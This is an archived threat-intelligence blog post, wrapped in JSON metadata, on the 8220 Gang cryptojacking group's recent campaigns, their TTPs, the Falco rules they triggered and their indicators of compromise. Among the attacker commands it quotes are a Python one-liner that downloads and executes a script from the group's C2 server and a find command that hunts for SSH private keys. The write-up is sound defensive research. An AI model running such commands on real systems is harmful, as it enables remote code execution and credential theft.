{
	"id": "95ad92a7-d1fc-4ce0-b4e6-90f49852b569",
	"created_at": "2026-04-06T00:15:03.942379Z",
	"updated_at": "2026-04-10T13:11:54.810647Z",
	"deleted_at": null,
	"sha1_hash": "3053d8fc62fda388518356d4e8f1be78ee7fcc58",
	"title": "8220 Gang Continues to Evolve With Each New Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 314194,
	"plain_text": "8220 Gang Continues to Evolve With Each New Campaign\r\nBy Crystal Morin\r\nPublished: 2023-02-14 · Archived: 2026-04-02 12:28:33 UTC\r\nhttps://sysdig.com/blog/8220-gang-continues-to-evolve/\r\nPage 1 of 6\n\n8220 Gang has been dubbed a group of low-level script kiddies with an equally disappointing name, based on\r\ntheir original use of port 8220 for Command and Control (C2) network communications dating back to 2017.\r\nSince an initial Talos report in late 2018, the group has continued to use, learn, and benefit from the efforts of their\r\ncounterparts in the cryptojacking world. The group is fairly well known for regularly changing its tactics,\r\ntechniques, and procedures (TTPs), either to avoid detection or because they are learning and continuing to\r\nimprove with each campaign.\r\nIn this blog, we dig into a few recent 8220 Gang attacks captured by Sysdig's Threat Research Team. We will let\r\nyou know which of their counterparts they are currently stealing tools from and highlight their new and improved\r\ntechniques. As always, a list of indicators of compromise (IoCs) can be found at the end of the blog.\r\nThis gang is hardly original\r\n8220 Gang is well known for using the tactics and techniques of other groups, and there are a few reasons\r\nwhy: either it is easier to steal and this gang is not sophisticated enough to create its own tools, or they are\r\ntrying to obfuscate attribution. Occam's Razor dictates that it is the former. 
8220 Gang has been previously\r\nreported as having borrowed TeamTNT and Rocke Group scripts and miners, and WatchDog domain naming\r\nstyles.\r\nSummary of past campaigns\r\nCisco Talos first reported on 8220 Gang in December 2018, with a timeline and description of the group's initial\r\nefforts, which included: exploiting Struts2, Redis, and Weblogic; using whatMiner; and using malicious Docker\r\nimages. Cloud security practitioners might remember that the threat actor known as TeamTNT also emerged\r\naround this time, exploiting many of the same vulnerabilities and misconfigurations, specifically the exposed\r\nDocker endpoint and vulnerable instances of Redis. In mid-2021, Lacework identified 8220 Gang's XMRig\r\nvariant called PwnRig, in addition to a modified Tsunami-based IRC botnet and a new loader script. 8220 Gang's\r\nuse of PwnRig was notable because it was the first recorded instance of the group making changes to compiled\r\ncode, as opposed to scripts. 8220 Gang's changes to XMRig in creating PwnRig obfuscate the configuration file\r\nand mining pool, both typically used as IoCs.\r\nMore recently, SentinelOne reported in July and October 2022 on 8220 Gang expanding their botnet and\r\ncryptomining distribution. In these campaigns, the group continued to exploit misconfigured and vulnerable\r\npublic-facing hosts. New TTPs in these reports included the use of the PureCrypter Malware-as-a-Service\r\ndownloader, shifting C2 infrastructure between 89.34.27[.]167 and 79.110.62[.]23, using Discord to\r\nstash malware, and downloading commands from a remote server via a shell script with the name jira?confluence.\r\nWhat are we seeing now?\r\nOur most recently observed 8220 Gang attacks, between November 2022 and January 2023, have many similarities\r\nwith those previously observed and detailed, namely that the end goal is cryptojacking. 
The group continues to\r\nscan the internet for vulnerable applications, using masscan and spirit for discovery efforts. Unsurprisingly, two of\r\nour three captures were against exploitable Oracle Weblogic applications. The other campaign attacked a\r\nvulnerable Apache web server. The group also still deploys the PwnRig fork of XMRig and uses cron to schedule\r\npersistence.\r\nWhat has changed? The first-stage loader in our January capture is a shell script named xms downloaded from\r\nthat campaign's main C2 185[.]106[.]94[.]146. The main difference between the November and January\r\ncampaigns is that the newer attacks are more robust. One example is the addition of lwp-download as a backup\r\ndownload tool to wget and cron. Another is the creation of init.d services for persistence. The newest attack also\r\nchecks for an active C2 connection before attempting to (re-)install itself.\r\nEarly on in their efforts, 8220 Gang reused C2 infrastructure. We can now say with confidence that the group has\r\nsince upgraded to consistently changing their C2 IP addresses. 8220 Gang also used the oanacroner script for the\r\nfirst time, which is something that has been previously reported for the Rocke cryptomining group. Between the\r\nNovember and January attacks, both domains and IP addresses were rotated.\r\nAdditionally, in January, 8220 Gang used the command find /root/ /root /home -maxdepth 2 -name id_rsa* as a\r\nnew discovery tactic to locate private keys. The group also added more defense evasion tactics, including the use\r\nof bash -sh to erase their steps, and introduced the following base64-encoded Python script to gather their\r\ntoolset:\r\npython -c 'import urllib; exec(urllib.urlopen(\"http[://]185.106.94.146/e.py\").read())'\r\nATT\u0026CK Matrix and Falco Coverage\r\nThe tables below show the MITRE ATT\u0026CK-aligned Falco rules that were triggered during the three 8220 Gang\r\nattacks we received. 
Spoiler alert: there was a lot of consistency across the three campaigns! The first table lists\r\nFalco rules that were triggered in more than one campaign. The second table indicates deviations across the\r\ncampaigns, with rules that were only triggered once.\r\n8220 Gang techniques consistently used:\r\nFalco rule triggered | MITRE ATT\u0026CK Tactic\r\nExecution from /tmp | Execution, Privilege escalation, Defense evasion\r\nSuspicious system service modification | Persistence, Privilege escalation, Defense evasion\r\nModify ld.so.preload | Persistence, Privilege escalation, Defense evasion\r\nSuspicious cron modification | Persistence, Privilege escalation, Defense evasion\r\nWrite below root | Persistence, Defense evasion\r\nLaunch ingress remote file copy tools in container | Lateral movement\r\nSchedule cron jobs | Execution, Persistence, Privilege escalation\r\nWrite below binary dir | Persistence, Defense evasion\r\nRead shell configuration file | Discovery\r\nWrite below etc | Persistence, Defense evasion\r\nNew techniques observed in January:\r\nFalco rule triggered | MITRE ATT\u0026CK Tactic\r\nDetect malicious cmdlines (use of lwp_download) | Execution, Persistence, Privilege escalation\r\nSearch private keys or passwords | Discovery\r\nClear log activities | Defense evasion\r\nBase64-encoded python script execution | Defense evasion\r\nConclusion\r\nShockingly, 8220 Gang remains a household name in the cloud threat detection and response world. Although,\r\nby all signs and measures, they can still be described as \"script kiddies,\" the natural progression of their\r\ncampaigns means that someday soon, that label may be a misnomer. 
Following best practices for securing your\r\ncloud will ensure that you are protected from unsophisticated yet developing actors, such as 8220 Gang.\r\nIndicators of compromise\r\nC2 IP Addresses\r\n185.106.94[.]146\r\n85.209.134[.]86\r\n51.255.171[.]23\r\n194.38.23[.]170\r\nFilename | MD5\r\nlinux-d | 5cc46e42feea62c6fbe2d600dd5aab51\r\noanacroner | 0621ed468aa68a2b46391e3455a049ec\r\nircd | 63a86932a5bad5da32ebd1689aa814b3\r\ninitdr | 915aec68a5b53aa7681a461a122594d9\r\nsysdown | 90df9de121f55f1d01b370f362d13aca\r\napache | 1bb8edf3ed8693df62bcbfe2fe05dadd\r\nxms | 13fe53f6a2632f05c16da40de9bfc829\r\n.bashrc | 92c3c4f1c5fb684a1f92cd1ddeb1d9fb\r\n.ntpdate | 26803695b83b5e39290d654fcd28774a\r\npwnrig | 6b2b76ffa0926f049dfa28cf03bd8e40\r\nxms | 13fe53f6a2632f05c16da40de9bfc829\r\nbashirc.x86_64 | 63a86932a5bad5da32ebd1689aa814b3\r\nspirit | 09c305e3e06bf1a54d28f16a2b38c979\r\ninitdr | 0ffa42915a8182dca447772138ef4510\r\nbashirc | 63a86932a5bad5da32ebd1689aa814b3\r\n.tmpest | a4c97040c898e2ad416d1ddef826491d\r\nmasscan | eefc0ce93d254982fbbcd26460f3d10d\r\njira?confluence | a4c97040c898e2ad416d1ddef826491d\r\nFor additional IoCs associated with this campaign, please visit our GitHub page.\r\nSource: https://sysdig.com/blog/8220-gang-continues-to-evolve/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sysdig.com/blog/8220-gang-continues-to-evolve/"
	],
	"report_names": [
		"8220-gang-continues-to-evolve"
	],
	"threat_actors": [
		{
			"id": "7c053836-8f50-4d40-bc5c-7088967e1b57",
			"created_at": "2022-10-25T16:07:24.549525Z",
			"updated_at": "2026-04-10T02:00:05.03048Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra",
				"G0106",
				"Iron Group",
				"Rocke"
			],
			"source_name": "ETDA:Rocke",
			"tools": [
				"Godlua",
				"Kerberods",
				"LSD",
				"Pro-Ocean",
				"Xbash"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7",
			"created_at": "2023-06-23T02:04:34.839947Z",
			"updated_at": "2026-04-10T02:00:04.99239Z",
			"deleted_at": null,
			"main_name": "8220 Gang",
			"aliases": [
				"8220 Mining Group",
				"Returned Libra",
				"Water Sigbin"
			],
			"source_name": "ETDA:8220 Gang",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f809bfcb-b200-4988-80a8-be78ef6a52ef",
			"created_at": "2023-01-06T13:46:39.186988Z",
			"updated_at": "2026-04-10T02:00:03.240002Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"Adept Libra"
			],
			"source_name": "MISPGALAXY:TeamTNT",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4",
			"created_at": "2022-10-25T15:50:23.334495Z",
			"updated_at": "2026-04-10T02:00:05.264841Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"TeamTNT"
			],
			"source_name": "MITRE:TeamTNT",
			"tools": [
				"Peirates",
				"MimiPenguin",
				"LaZagne",
				"Hildegard"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "905eabd9-2b7f-483d-86bd-0c72f96b4162",
			"created_at": "2023-01-06T13:46:39.02749Z",
			"updated_at": "2026-04-10T02:00:03.185957Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra"
			],
			"source_name": "MISPGALAXY:Rocke",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "942c5fbc-31df-4aef-8268-e3ccf6692ec8",
			"created_at": "2024-07-09T02:00:04.434476Z",
			"updated_at": "2026-04-10T02:00:03.671196Z",
			"deleted_at": null,
			"main_name": "Water Sigbin",
			"aliases": [
				"8220 Gang"
			],
			"source_name": "MISPGALAXY:Water Sigbin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f",
			"created_at": "2022-10-25T15:50:23.360509Z",
			"updated_at": "2026-04-10T02:00:05.337702Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Rocke"
			],
			"source_name": "MITRE:Rocke",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434503,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3053d8fc62fda388518356d4e8f1be78ee7fcc58.pdf",
		"text": "https://archive.orkl.eu/3053d8fc62fda388518356d4e8f1be78ee7fcc58.txt",
		"img": "https://archive.orkl.eu/3053d8fc62fda388518356d4e8f1be78ee7fcc58.jpg"
	}
}